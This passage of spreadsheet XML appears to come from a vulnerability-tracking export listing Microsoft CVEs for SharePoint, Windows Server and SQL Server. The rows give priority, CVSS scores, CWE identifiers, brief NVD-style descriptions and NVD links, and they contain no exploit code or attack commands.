      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K47" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S47" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69465</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69518</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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 s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S48" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Desktop allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69518</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69669</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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9" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S49" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Kernel allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69669</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69716</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K50" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S50" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69716</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69724</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K51" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S51" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69724</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69860</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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2" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S52" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69860</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70203</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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3" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S53" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70203</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71336</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K54" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L54" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S54" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Work Folder Service allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71336</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73006</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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5" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S55" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73006</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73016</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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6" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S56" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73016</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73028</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K57" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S57" s="5" t="inlineStr">
        <is>
          <t>Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73028</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77480</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K58" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="S58" s="5" t="inlineStr">
        <is>
          <t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77480</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77481</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K59" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S59" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77481</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77482</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K60" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019</t>
        </is>
      </c>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S60" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77482</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77483</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K61" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="S61" s="5" t="inlineStr">
        <is>
          <t>Weak authentication in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77483</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77484</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K62" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S62" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77484</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77486</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K63" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019</t>
        </is>
      </c>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S63" s="5" t="inlineStr">
        <is>
